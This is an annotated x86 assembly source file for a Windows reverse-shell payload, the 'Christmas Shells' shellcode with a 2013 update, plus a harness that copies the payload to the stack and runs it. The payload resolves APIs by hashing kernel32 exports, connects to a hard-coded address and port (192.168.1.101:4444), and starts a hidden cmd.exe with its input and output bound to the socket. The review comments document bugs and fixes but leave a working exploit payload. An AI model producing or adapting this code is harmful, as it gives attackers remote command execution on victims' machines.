- ;*********************************** class101 Update (2013) *********************************
- ;
- ; Removed : hardcoded offset to PEB (not reliable in 2013)
- ; Removed : system() (requires AllocConsole, prompt crashes if parent crashes)
- ; Removed : AllocConsole() (prompt window visible)
- ; Updated : kernel32 base address detection (was finding KERNELBASE.dll on newer Windows)
- ; Added : CreateProcess() (does not require AllocConsole, the prompt is hidden,
- ; and it does not crash if the parent crashes)
- ;
- ; +24 (18h) bytes
- ;
- ; Update by Arnaud 'class101' Dovi - ad@heapoverflow.com
- ; http://steamcommunity.com/id/class101
- ; http://heapoverflow.com
- ;
- ;*********************************** Christmas Shells (2003) ********************************
- ; Callback Shell.
- ; Directly set std handles and call system()
- ;
- ; 206 (CEh) bytes
- ;
- ; its not code, its antic0de
- ; and it works now too %-)
- ; Left it in tasm format.
- ; tasm32 -ml /m5 shell.asm
- ; tlink32 -Tpe -c -x shell.obj ,,, import32
- ;
- ;*********************************** Christmas Shells ***************************************
- ; Jimminy jellicas its been jimplemented.
- ; Oddity,Dsp,Shammah,Santa Claus and the rest of the loco locals
- ; All the o/s peeps who know whats what.
- ;********************************************************************************************
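- .586p
- locals
- .model flat, stdcall
- extrn ExitProcess:PROC
- extrn WSAStartup:PROC
- extrn WSACleanup:PROC
- .data
- ; WSADATA buffer handed to WSAStartup(0101h) by the harness. Field sizes
- ; follow winsock.h: WSADESCRIPTION_LEN = 256, WSASYS_STATUS_LEN = 128, each
- ; string carrying one extra byte for the NUL.
- wsadescription_len equ 256
- wsasys_status_len equ 128
- WSAdata struct
- wVersion dw ?
- wHighVersion dw ?
- szDescription db wsadescription_len+1 dup (?)
- szSystemStatus db wsasys_status_len+1 dup (?)
- iMaxSockets dw ?
- iMaxUdpDg dw ?
- wPad dw ? ; C pads here so the pointer below sits at a 4-byte boundary (18Ch)
- lpVendorInfo dd ? ; char FAR* - a 32-bit pointer, not a word
- WSAdata ends
- ; sizeof(WSADATA) on Win32 is 400 (190h) bytes, which is what WSAStartup is
- ; given to fill. The original listing declared lpVendorInfo as a dw with no
- ; padding, so the buffer was 4 bytes short of that: a small .data overrun
- ; that happened to land on nothing important in this harness.
- wsadata WSAdata <?>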
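- .code
- ;****************************************************************************
- ; Test harness: initialise Winsock, copy the payload (realstart..codeend)
- ; onto the stack and jump to it.
- ;
- ; NOTE(review): the copy is executed from the stack (`jmp esp`), so this
- ; harness only works where the stack is executable - DEP/NX must be off for
- ; the process (e.g. link without /NXCOMPAT), otherwise it faults at the jump.
- ; That is a property of the harness, not of the payload itself.
- ;****************************************************************************
- start:
- ; Winsock start up: WSAStartup(MAKEWORD(1,1), &wsadata) returns 0 on success
- push offset wsadata
- push 0101h
- call WSAStartup
- test eax,eax
- jz winsock_found
- ; Failure path: exit cleanly. The original jumped to codeend, after which
- ; this listing has no code, so a failed WSAStartup fell off the end of .code.
- push eax ; exit code = the WSAStartup error value
- call ExitProcess ; declared extrn above; does not return
- winsock_found:
- ; Copy ourselves (realstart..codeend, inclusive) onto the stack.
- ; The 400h-byte reservation must stay >= the payload size (E6h bytes per the
- ; header's 206 + 24 count).
- mov ebx,offset realstart
- sub esp,400h
- mov eax,esp
- Copyit:
- mov cl,byte ptr [ebx]
- mov byte ptr [eax],cl
- inc eax
- inc ebx
- cmp ebx,offset codeend
- jbe Copyit ; unsigned: EBX holds an address (the original used the signed jle)
- jmp esp ; run the stack copy; never returns here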
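- ;****************************************************************************
- ; This is the start of the shell code. Position-independent; the harness
- ; copies it to the stack and enters at realstart.
- ;
- ; Sequence:
- ;   1. Find kernel32.dll via PEB->Ldr (load-order list, third entry).
- ;   2. Resolve LoadLibrary and CreateProcessA from kernel32's export table by
- ;      16-bit name hash, load WS2_32, resolve connect and WSASocket.
- ;   3. WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0)  - non-overlapped.
- ;   4. connect() to the hard-coded IP:port in sockdat.
- ;   5. CreateProcessA("cmd ...") with stdin/stdout/stderr = the socket and
- ;      handle inheritance on - a classic reverse shell.
- ;
- ; Register roles (details on the lines themselves):
- ;   EDI = cursor into the resolved-function table. It is written with stosd
- ;         over the already-executed PEB-walk code, i.e. the payload is
- ;         self-modifying and needs writable+executable memory.
- ;   EBX = cursor walking the hash table backwards.
- ;   EDX = base of the DLL currently being searched.
- ;
- ; NOTE(review): this is a payload, not a defended component. No call result
- ; is checked (WSASocket, connect, LoadLibrary, CreateProcessA), the hash walk
- ; terminates on a byte of the port (see the cmp ...,11h below), and the
- ; STARTUPINFO is built in borrowed process memory assumed to be zero-filled.
- ;****************************************************************************
- realstart:
- jmp over_data
- ; ---- data embedded in the code: reached through EDI-7 / EBX, never run ----
- ; 8 bytes of socket: a sockaddr_in stored as 02 01 so no zero byte appears;
- ; the 01 at sockdat+1 is decremented to 00 (sin_family -> 0002h = AF_INET)
- ; right before connect(). Port and address are in network byte order.
- sockdat db 02h,01h,11h,5Ch ; 115C, port (4444)
- db 0c0h,0a8h,01h,65h ; IP address 192.168.1.101
- ; 16 bytes of data: the API name-hash table. It is walked BACKWARDS from
- ; over_data, so resolution order is LoadLibrary, CreateProcessA (kernel32),
- ; then LoadLibrary("WS2_32"), then connect, WSASocket. A lone 01 byte ends a
- ; DLL's run of hashes and is patched to 00 to NUL-terminate the DLL name in
- ; front of it. The hash is the 16-bit sum computed at `hashy` below.
- hashes db 01h ; Termination
- ;dw 364Ah ; System msvcrt.dll ; - 9 bytes
- ;db "MSVCRT",01 ;
- dw 422Ah ; WSASocket ws2_32.dll
- dw 8AD4h ; Connect ws2_32.dll
- db "WS2_32",01
- dw 35E8h ; CreateProcessA kernel32.dll ; + 0 bytes
- dw 4E2Ch ; LoadLibrary kernel32.dll
- ;;;dw 817Ch ; AllocConsole kernel32.dll
- over_data:
- ; 7 byte Getself code: the pushed dword is the bytes 5F 57 C3 (pop edi /
- ; push edi / ret) plus AC (never reached). `call esp` executes it, so EDI
- ; ends up holding the return address - the instruction after `call esp` -
- ; and ESP is back where it was, with the dword still on top of the stack.
- push 0ACC3575Fh ; Pop/Push/Ret
- call esp ; EIP returned in EDI
- ; EDI - 7 points to end of hashes (= over_data)
- ; find Kernel32 base + store the ProcessParameters pointer
- ;;;mov esi,7ffdf00ch ; Offset into PEB
- xor eax, eax ; EAX = 0 ; + 4 bytes
- mov esi, fs:[eax + 30h] ; ESI = PEB (TEB+30h) ;
- add esi,0Ch ; ESI = &PEB->Ldr
- lodsd ; EAX = PEB->Ldr (PEB_LDR_DATA*); ESI = &PEB->ProcessParameters (PEB+10h)
- push dword ptr [esi] ; Store PEB->ProcessParameters for later (STARTUPINFO scratch area)
- ;;;mov esi,[eax + 1ch] ; InInitializationOrderModuleList
- ;;;lodsd ; Grab Next Pointer (Kernel32.dll) in eax
- ;;;mov edx,[eax + 08h] ; EDX = kernel32.dll base address
- mov esi,[eax + 0Ch] ; ESI = Ldr->InLoadOrderModuleList.Flink = entry #1 (the exe) ; + 2 bytes
- lodsd ; EAX = entry #2 (ntdll.dll) ;
- xchg esi,eax ; Only 1 byte with AX/EAX ;
- lodsd ; EAX = entry #3 - kernel32.dll in load order ;
- ; NOTE(review): exe / ntdll / kernel32 is the observed load order, not a
- ; documented contract. It is the 2013 replacement for the init-order walk
- ; that landed on KERNELBASE.dll (see header).
- mov edx,[eax + 18h] ; EDX = LDR_DATA_TABLE_ENTRY.DllBase = kernel32.dll base ;
- push -8 ; EDI Adjuster for later loadlibrary calls: [edi+ebp] = LoadLibrary
- lea ebx,[edi-8] ; EBX = over_data - 1 = last byte of the hash table
- LookupFunctions:
- ; Entered once per DLL with EDX = its base. Builds three stack slots:
- ; [ebp-4] = AddressOfFunctions, [ebp-8] = AddressOfNames,
- ; [ebp-0Ch] = AddressOfNameOrdinals (all with the base already added).
- push esp ; Reset the stack base pointer
- pop ebp ; So we can use EBP, and store current stack pos
- ; get RVA tables
- mov ecx,dword ptr [edx + 3ch] ; ECX = e_lfanew (NT header offset)
- mov esi,dword ptr [ecx + edx + 78h] ; ESI = DataDirectory[EXPORT].VirtualAddress (NT header + 78h)
- lea esi,dword ptr [esi + edx + 1ch] ; ESI = &ExportDir->AddressOfFunctions (export dir + 1Ch)
- mov cl,3 ; 3 Loops. Only CL is written: relies on e_lfanew < 100h so CH is already 0
- ; NOTE(review): a larger e_lfanew would make this loop push extra dwords
- ; (reading past the three table fields); [ebp-4..-0Ch] still refer to the
- ; first three pushes, so it would not break, just waste stack.
- StoreAddress:
- ; Store address's
- lodsd ; EAX = Address Table / Name Ptrz / Ordinal RVA
- add eax,edx ; Add Base Location
- push eax ; Store it on stack
- loop short StoreAddress ; Loopy
- ;*************************************************************************
- ; [EDI-7] = end of hashes
- ; EDI = start of Function address storage location
- ; EDX = dll base address
- ; EBX = address of hashes +1 (offset for loadlib implementation)
- ;*************************************************************************
- SearchStart:
- dec ebx ; Dec our EBX pointer to the hashes.
- mov esi,dword ptr [ebp - 8] ; Get Name Ptrz Table
- xor eax,eax ; Set Our API Counter To 0
- push eax ; Push a 0 for later
- Search:
- push eax ; Store our API counter
- lodsd ; Load address of function name from [ESI] into EAX
- add eax,edx ; Add DLL base address
- xor ecx,ecx ; Zero our hash value counter
- hashy:
- ; hash = sum over the name of (word at p) + (byte at p), 16 bits wide.
- ; A plain checksum: collisions are possible, and the FIRST export (in
- ; AddressOfNames order) whose hash matches wins. Any new hash must be checked
- ; for uniqueness against that DLL's whole name table.
- add cx,word ptr [eax] ; Add it up
- add cl,byte ptr [eax] ; Add it up
- inc eax ; Move along
- cmp byte ptr [eax],01 ; End of string
- jge hashy ; Nup (signed compare: a byte >= 80h would also stop; export names are ASCII)
- pop eax ; Restore Our API Counter
- inc eax ; Inc our API counter
- cmp cx,[ebx] ; Compare To Hash Value
- jne Search ; We go and check the next name if they don't match
- ; GotMatch
- ; NOTE(review): there is no bound on the name table - a hash with no match
- ; walks off the end of AddressOfNames instead of failing cleanly.
- pop esi ; Pop a 0
- xchg esi,eax ; Get Our API Counter Into ESI, 0 into EAX
- dec esi ; Adjust our API counter back 1
- shl esi,1 ; ESI = ESI * 2
- add esi,dword ptr [ebp - 0ch] ; ESI = &AddressOfNameOrdinals[index]
- lodsw ; Get Ordinal in AX Word Only
- shl eax,2 ; EAX = ordinal * 4
- add eax,dword ptr [ebp - 4h] ; EAX = &AddressOfFunctions[ordinal]
- xchg esi,eax ; Swap them around
- lodsd ; Load Function RVA into EAX
- add eax,edx ; Normalize with the base and all is done.
- ; NOTE(review): forwarded exports (an RVA that points back into the export
- ; directory, i.e. a "DLL.Func" string) are not handled; make sure any API
- ; you add to the table is not a forwarder on the target OS version.
- stosd ; Store the function location in [EDI]
- ; We sub 1 here, 1 up at SearchStart. Strange loadlib implementation
- dec ebx ; To move to next hash. No byte loss
- cmp byte ptr [ebx],01h ; Hash dll separator
- jne short SearchStart ; Go and find another API
- ; Requires a loadlibrary call
- leave ; ESP = EBP (drops the 3 table slots), then pops the EDI adjuster into EBP
- dec byte ptr [ebx] ; Create a null terminator
- sub ebx,06h ; Move down hash table
- ; Past our hashes? After the kernel32 run EBX lands on 'W' of "WS2_32";
- ; after the WS2_32 run it lands on sockdat+2, the high byte of the
- ; network-order port (11h for 4444). Hence:
- ; !!! 11h MUST BE UPDATED WHENEVER THE PORT CHANGES !!! - otherwise the walk
- ; falls through to LoadLibrary on the sockdat bytes and then dereferences
- ; whatever it returns as a module base. Conversely a port whose high byte is
- ; 57h ('W') would stop the walk one DLL early.
- cmp byte ptr [ebx],11h ; Past our hashes? (!!! 11h TO UPDATE AFTER THE PORT !!!)
- je short Done_Finding ; Done
- push ebx ; Push address of dll name ("WS2_32", NUL-terminated just above)
- call dword ptr [edi + ebp] ; Call LoadLibrary (EBP = -8 -> [edi-8], the first stored pointer)
- xchg edx,eax ; EDX = new DLL base (no NULL check; a failed load faults in LookupFunctions)
- push -16 ; Store EDI Adjuster
- dec ebx ; We sub 1 here, 1 up at SearchStart. Strange loadlib implementation
- jne short LookupFunctions ; Load the next DLLS functions (always taken: EBX is a pointer, never 0)
- Done_Finding:
- ;*****************************************
- ; [EDI - 04h] WSASocket
- ; [EDI - 08h] Connect
- ; [EDI - 0ch] CreateProcess
- ; [EDI - 10h] LoadLibrary
- ; Stack top: the PEB->ProcessParameters pointer pushed earlier.
- ;*****************************************
- ;;;xchg eax,ebp ; Store the system() address ; -1 bytes
- ;;;; Create console
- ;;;call [EDI - 10h] ; Call AllocConsole() ; -3 bytes
- xor ecx,ecx ; Null ECX
- ; call WSASocket(af=2 AF_INET, type=1 SOCK_STREAM, protocol=0, NULL, g=0, dwFlags=0)
- ; dwFlags=0 means no WSA_FLAG_OVERLAPPED - presumably why WSASocket is used
- ; rather than socket(): the handle is handed straight to the child as its
- ; std handles below.
- push ecx ; Push 0
- push ecx ; Push 0
- push ecx ; Push 0
- push ecx ; Push 0
- inc ecx ; Increment ecx
- push ecx ; Push 1
- inc ecx ; Increment ecx
- push ecx ; Push 2
- call [edi - 04h] ; Call WSASocket -> EAX = socket (INVALID_SOCKET is not checked)
- xchg ecx,edi ; ECX = function table cursor; EDI is free to reuse
- ; Build a STARTUPINFOA in borrowed memory at ProcessParameters + 90h.
- ; NOTE(review): that region (CurrentDirectories in the public
- ; RTL_USER_PROCESS_PARAMETERS layout) is assumed to be zero-filled, so that
- ; cb, wShowWindow (0 = SW_HIDE), the upper word of dwFlags etc. read as 0.
- ; Only dwFlags and the three std handles are written. Verify on the target.
- pop edi ; Pop PEB->ProcessParameters
- ;;;add edi,18h ; And adjust
- sub edi,-90h ; EDI = STARTUPINFO location
- ; Fix: this used to be `sub di,-90h`, a 16-bit add that cannot carry into the
- ; upper half of EDI - a ProcessParameters whose low 16 bits are >= 0FF70h
- ; would have wrapped 64K below the intended structure. The full-width form is
- ; still null-free; together with the change at +38h below it should be
- ; size-neutral (+1 byte here, -1 there).
- push 20646D63h ; Push "cmd " on stack - lpCommandLine, see NOTE before CreateProcessA
- push esp ; lpProcessInformation: points at the "cmd " dword (16 bytes written on return)
- push edi ; lpStartupInfo
- mov word ptr [edi+2Ch],101h ; si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
- sub edi,-38h ; EDI = &si.hStdInput (offset 38h); full-width for the same reason as above
- stosd ; si.hStdInput  = socket (EAX still holds the WSASocket result)
- stosd ; si.hStdOutput = socket
- stosd ; si.hStdError  = socket
- ; Setup socket data: turn sockdat's 02 01 into 02 00 = AF_INET
- dec ebx ; Need to
- dec byte ptr [ebx] ; Remove 01
- dec ebx ; And position
- ; call connect(s, (sockaddr*)sockdat, namelen)
- push ebx ; namelen: EBX (an address) is passed as the length. "Doesn't seem to
- ; matter" because it is >= sizeof(sockaddr_in) = 10h, which is all that is
- ; checked here; a stricter provider could reject it.
- push ebx ; Push location of structure
- push eax ; Push socket
- xchg esi,ecx ; ESI = function table cursor
- call [esi - 08h] ; Call Connect (result not checked; cmd is spawned regardless)
- ; Call CreateProcessA(NULL, "cmd ...", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)
- ; NOTE(review): the command line is NOT explicitly NUL-terminated. The bytes
- ; above "cmd " on the stack (the getself dword, then the start of the code
- ; copy) are passed as trailing argument text up to the first 0 byte.
- ; It works because CreateProcess resolves the first token ("cmd") and cmd.exe
- ; tolerates the junk that follows - confirm on the target before relying on
- ; it. On return the 16-byte PROCESS_INFORMATION is written over "cmd " and
- ; the first bytes of the code copy, which are no longer needed by then.
- xor ecx,ecx
- push ecx ; lpCurrentDirectory = NULL
- push ecx ; lpEnvironment = NULL
- push ecx ; dwCreationFlags = 0
- push 1 ; bInheritHandles = TRUE (the socket handles must be inherited)
- push ecx ; lpThreadAttributes = NULL
- push ecx ; lpProcessAttributes = NULL
- lea eax,[esp+20h] ; EAX = &"cmd " (8 dwords up: 6 args + lpStartupInfo + lpProcessInformation)
- push eax ; lpCommandLine
- push ecx ; lpApplicationName = NULL
- call [esi - 0ch] ; Call CreateProcessA (result not checked)
- ;push esp ; Location to cmd
- ;call ebp ; Call system()
- ;;;call WSACleanup
- ; NOTE(review): nothing follows. After CreateProcessA returns, execution runs
- ; off the end of the stack copy; ExitProcess is declared by the harness but
- ; never called, so the parent presumably dies here while the child cmd.exe
- ; lives on (the "does not crash if parent crashes" property from the header).
- codeend: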
- end start